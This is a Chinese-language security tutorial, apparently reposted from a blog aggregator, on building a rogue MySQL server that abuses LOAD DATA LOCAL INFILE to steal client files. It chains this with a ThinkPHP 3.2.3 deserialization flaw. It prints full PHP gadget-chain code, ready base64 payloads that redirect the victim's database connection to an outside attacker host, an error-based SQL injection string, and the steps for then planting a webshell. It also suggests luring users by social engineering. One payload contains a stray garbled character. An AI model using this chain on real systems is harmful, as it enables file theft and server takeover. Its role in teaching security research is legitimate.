前言

注：本文不涉及對(duì)MySQL協(xié)議報(bào)文研究，僅講解原理，并且做部分演示。

搭建MySQL惡意服務(wù)器讀取文件這件事，雖然直接利用門檻較高，但是由于在網(wǎng)上看到了一種比較新穎的利用方式（利用社會(huì)工程學(xué)引誘用戶連接MySQL進(jìn)而讀取用戶文件），個(gè)人覺得比較有意思，總結(jié)了一下攻擊原理以及攻擊方式，因此就有了這篇文章。

原理

在闡述具體原理之前，先介紹幾個(gè)SQL語(yǔ)句，以便后文理解

首先在tmp目錄下新建一個(gè)tmp.txt

內(nèi)容如下：

然后執(zhí)行下方SQL語(yǔ)句，即可將tmp.txt文件導(dǎo)入其中：

mysql> load data local infile "/tmp/tmp.txt" into table test fields terminated by '\n'; Query OK, 3 rows affected (2.63 sec) Records: 3 Deleted: 0 Skipped: 0 Warnings: 0 ? mysql> select * from Test; +-------+ | name | +-------+ | admin | | user | | Lxxx | +-------+ 3 rows in set (0.00 sec)

• load data local infile語(yǔ)句會(huì)讀取客戶端本地的文件
• load data infile語(yǔ)句會(huì)讀取服務(wù)端本地的文件
• terminated by表示以某某字符分割，默認(rèn)為Tab，這里我設(shè)置為了\n

這個(gè)時(shí)候可能就會(huì)繞不清楚，什么是服務(wù)端，什么是客戶端？

因?yàn)橐话闱闆r下，調(diào)試SQL都是在本機(jī)，并且數(shù)據(jù)庫(kù)也在本機(jī)，這樣的情況就導(dǎo)致，客戶端和服務(wù)端都是在本地，有點(diǎn)難區(qū)分，下面我用一張圖來簡(jiǎn)述。

在本地，由于客戶端和服務(wù)端都是在同一個(gè)磁盤下，因此，在本地，無論是否加local都是可以將文件傳入數(shù)據(jù)庫(kù)的，而后面講到利用MySQL惡意服務(wù)器讀取文件的漏洞，就是需要使用local，來達(dá)到將文件帶出的目的。

【查看相關(guān)資料文檔】
1、網(wǎng)絡(luò)安全學(xué)習(xí)路線
2、電子書籍（白帽子）
3、安全大廠內(nèi)部視頻
4、100份src文檔
5、常見安全面試題
6、ctf大賽經(jīng)典題目解析
7、全套工具包
8、應(yīng)急響應(yīng)筆記

下面我畫了兩張圖，第一張圖是正常業(yè)務(wù)流程，第二張圖是攻擊者惡意攻擊的流程。

正常的后端業(yè)務(wù)流程如下：

當(dāng)攻擊者劫持后端服務(wù)器，并且在公網(wǎng)中搭建惡意的MySQL后，流程圖如下：

這樣攻擊者就可以在后端達(dá)到任意文件下載的目的。

演示

雖說在之前的某個(gè)CTF比賽出過類似的題目，但是我這里還是使用ThinkPHP3.2.3存在的反序列化漏洞，結(jié)合MySQL惡意服務(wù)器讀取敏感文件，進(jìn)而RCE的樣例。

首先在本地先啟動(dòng)一個(gè)ThinkPHP3.2.3的框架，連接好數(shù)據(jù)庫(kù)，在Application/Home/Controller/HelloController.class.php控制器中寫一個(gè)反序列化入口。

<?php namespace Home\Controller; ? use Think\Controller; ? class HelloController extends Controller { public function index($Lxxx){ echo base64_decode($Lxxx); $a = unserialize(base64_decode($Lxxx)); } }

具體的鏈子，我就不跟了，網(wǎng)上也有很多，雖然鏈子具體的方法不跟進(jìn)，但是我還是需要介紹一下這條鏈子能起到一個(gè)什么作用。

首先需要一個(gè)反序列化入口，這是毋庸置疑的，沒有反序列化入口，那就無法進(jìn)行反序列化，所以上方我就在HelloController控制器中自己寫了一個(gè)反序列化入口；

這條鏈子最終的鏈尾是需要數(shù)據(jù)庫(kù)的相關(guān)信息，例如數(shù)據(jù)庫(kù)名，數(shù)據(jù)庫(kù)端口，數(shù)據(jù)庫(kù)用戶以及密碼，并且這條鏈子是允許使用堆疊注入的，因此如果知道數(shù)據(jù)庫(kù)相關(guān)信息，那么就可以利用堆疊注入寫入一句話木馬進(jìn)而getshell。

這里我就直接將鏈子放出來，然后演示一下如何搭建一個(gè)惡意的MySQL數(shù)據(jù)庫(kù)，獲取敏感文件，進(jìn)而getshell。

<?php namespace Think\Db\Driver{ use PDO; class Mysql{ protected $options = array( PDO::MYSQL_ATTR_LOCAL_INFILE => true // 開啟才能讀取文件 ); protected $config = array( "debug" => 1, "database" => "tp323", "hostname" => "127.0.0.1", "hostport" => "8889", "charset" => "utf8", "username" => "root", "password" => "root" ); } } ? namespace Think\Image\Driver{ use Think\Session\Driver\Memcache; class Imagick{ private $img; ? public function __construct(){ $this->img = new Memcache(); } } } ? namespace Think\Session\Driver{ use Think\Model; class Memcache{ protected $handle; ? public function __construct(){ $this->handle = new Model(); } } } ? namespace Think{ use Think\Db\Driver\Mysql; class Model{ protected $options = array(); protected $pk; protected $data = array(); protected $db = null; ? public function __construct(){ $this->db = new Mysql(); $this->options['where'] = ''; $this->pk = 'id'; $this->data[$this->pk] = array( "table" => "tp_user where 1=updatexml(1,concat(0x7e,version(),0x7e),1)#", "where" => "1=1" ); } } } ? namespace { echo base64_encode(serialize(new Think\Image\Driver\Imagick())); } ?

上方鏈子中的數(shù)據(jù)庫(kù)信息為我本地的數(shù)據(jù)庫(kù)信息，執(zhí)行該文件后，得到序列化字符串如下：

TzoyNjoiVGhpbmtcSW1hZ2VcRHJpdmVyXEltYWdpY2siOjE6e3M6MzE6IgBUaGlua1xJbWFnZVxEcml2ZXJcSW1hZ2ljawBpbWciO086Mjk6IlRoaW5rXFNlc3Npb25cRHJpdmVyXE1lbWNhY2hlIjoxOntzOjk6IgAqAGhhbmRsZSI7TzoxMToiVGhpbmtcTW9kZWwiOjQ6e3M6MTA6IgAqAG9wdGlvbnMiO2E6MTp7czo1OiJ3aGVyZSI7czowOiIiO31zOjU6IgAqAHBrIjtzOjI6ImlkIjtzOjc6IgAqAGRhdGEiO2E6MTp7czoyOiJpZCI7YToyOntzOjU6InRhYmxlIjtzOjU5OiJ0cF91c2VyIHdoZXJlIDE9dXBkYXRleG1sKDEsY29uY2F0KDB4N2UsdmVyc2lvbigpLDB4N2UpLDEpIyI7czo1OiJ3aGVyZSI7czozOiIxPTEiO319czo1OiIAKgBkYiI7TzoyMToiVGhpbmtcRGJcRHJpdmVyXE15c3FsIjoyOntzOjEwOiIAKgBvcHRpb25zIjthOjE6e2k6MTAwMTtiOjE7fXM6OToiACoAY29uZmlnIjthOjc6e3M6NToiZGVidWciO2k6MTtzOjg6ImRhdGFiYXNlIjtzOjU6InRwMzIzIjtzOjg6Imhvc3RuYW1lIjtzOjk6IjEyNy4wLjAuMSI7czo4OiJob3N0cG9ydCI7czo0OiI4ODg5IjtzOjc6ImNoYXJzZXQiO3M6NDoidXRmOCI7czo4OiJ1c2VybmFtZSI7czo0OiJyb290IjtzOjg6InBhc3N3b3JkIjtzOjQ6InJvb3QiO319fX19

傳給url

可以看到報(bào)錯(cuò)注入成功。

然后，在公網(wǎng)上搭建一個(gè)惡意的MySQL服務(wù)，這個(gè)腳本在Github中已經(jīng)有前輩寫好了，具體原理就是分析相關(guān)的MySQL報(bào)文，然后與后端服務(wù)器創(chuàng)建惡意連接，并且獲得自己想要的文件。

下載好POC之后，修改一下要讀取的文件名。

然后利用Python啟動(dòng)，啟動(dòng)完成后，惡意的MySQL就在監(jiān)聽3307端口。

python rogue_mysql_server.py

接下來修改之前的鏈子，把IP和端口修改為遠(yuǎn)程惡意的MySQL地址，然后生成鏈子。

<?php namespace Think\Db\Driver{ use PDO; class Mysql{ protected $options = array( PDO::MYSQL_ATTR_LOCAL_INFILE => true // 開啟才能讀取文件 ); protected $config = array( "debug" => 1, "database" => "tp323", "hostname" => "1.1.1.1", "hostport" => "3307", "charset" => "utf8", "username" => "root", "password" => "root" ); } } ? namespace Think\Image\Driver{ use Think\Session\Driver\Memcache; class Imagick{ private $img; ? public function __construct(){ $this->img = new Memcache(); } } } ? namespace Think\Session\Driver{ use Think\Model; class Memcache{ protected $handle; ? public function __construct(){ $this->handle = new Model(); } } } ? namespace Think{ use Think\Db\Driver\Mysql; class Model{ protected $options = array(); protected $pk; protected $data = array(); protected $db = null; ? public function __construct(){ $this->db = new Mysql(); $this->options['where'] = ''; $this->pk = 'id'; $this->data[$this->pk] = array( "table" => "tp_user where 1=updatexml(1,concat(0x7e,version(),0x7e),1)#", "where" => "1=1" ); } } } ? namespace { echo base64_encode(serialize(new Think\Image\Driver\Imagick())); }

得到：

TzoyNjoiVGhpbmtcSW1hZ2VcRHJpdmVyXEltYWdpY2siOjE6e3M6MzE6IgBUaGlua1xJbWFnZVxEcml2ZXJcSW1hZ2ljawBpbWciO086Mjk6IlRoaW5rXFNlc3Npb25cRHJpdmVyXE1lbWNhY2hlIjoxOntzOjk6IgAqAGhhbmRsZSI7TzoxMToiVGhpbmtcTW9kZWwiOjQ6e3M6MTA6IgAqAG9wdGlvbnMiO2E6MTp7czo1OiJ3aGVyZSI7czowOiIiO31zOjU6IgAqAHBrIjtzOjI6ImlkIjtzOjc6IgAqAGRhdGEiO2E6MTp7czoyOiJpZCI7YToyOntzOjU6InRhYmxlIjtzOjU5OiJ0cF91c2VyIHdoZXJlIDE9dXBkYXRleG1sKDEsY29uY2F0KDB4N2UsdmVyc2lvbigpLDB4N2UpLDEpIyI7czo1OiJ3aGVyZSI7czozOiIxPTEiO319czo1OiIAKgBkYiI7TzoyMToiVGhpbmtcRGJcRHJpdmVyXE15c3FsIjoyOntzOjEwOiIAKgBvcHRpb25zIjthOjE6e2k6MTAwMTtiOjE7fXM6OToiACoAY29uZmlnIjthOjc6e3M6NToiZGVidWciO2k6MTtzOjg6ImRhdGFiYXNlIjtzOjU6InRwMzIzIjtzOjg6Imhvc3RuYW1lIjtzOjc6IjEuMS4xLjEiO3M6ODoiaG9zdHBvcnQiO3M6NDoiMzMwNyI7czo3OiJjaGFyc2V0IjtzOjQ6InV0ZjgiO3M6ODoidXNlcm5hbWUiO3M6NDoicm９vdCI7czo4OiJwYXNzd29yZCI7czo0OiJyb290Ijt9fX19fQ==

傳給HomeController控制器，

然后就可以在遠(yuǎn)程ＶＰＳ中的mysql.log得到之前需要惡意下載的文件。

現(xiàn)在得到了相關(guān)數(shù)據(jù)庫(kù)信息，然后就可以再次構(gòu)造鏈子，利用堆疊注入寫入一句話木馬getshell了。

使用場(chǎng)景

• 能劫持后端服務(wù)器，但無法getshell的時(shí)候，可以采用這個(gè)方法getshell（例如ThinkPHP3.2.3的利用鏈只能到數(shù)據(jù)庫(kù)層，則可以通過這個(gè)方法getshell）；
• 能引誘用戶連接惡意MySQL（社會(huì)工程學(xué)）。

總結(jié)

以上是生活随笔為你收集整理的【网络安全】如何搭建MySQL恶意服务器读取文件？的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。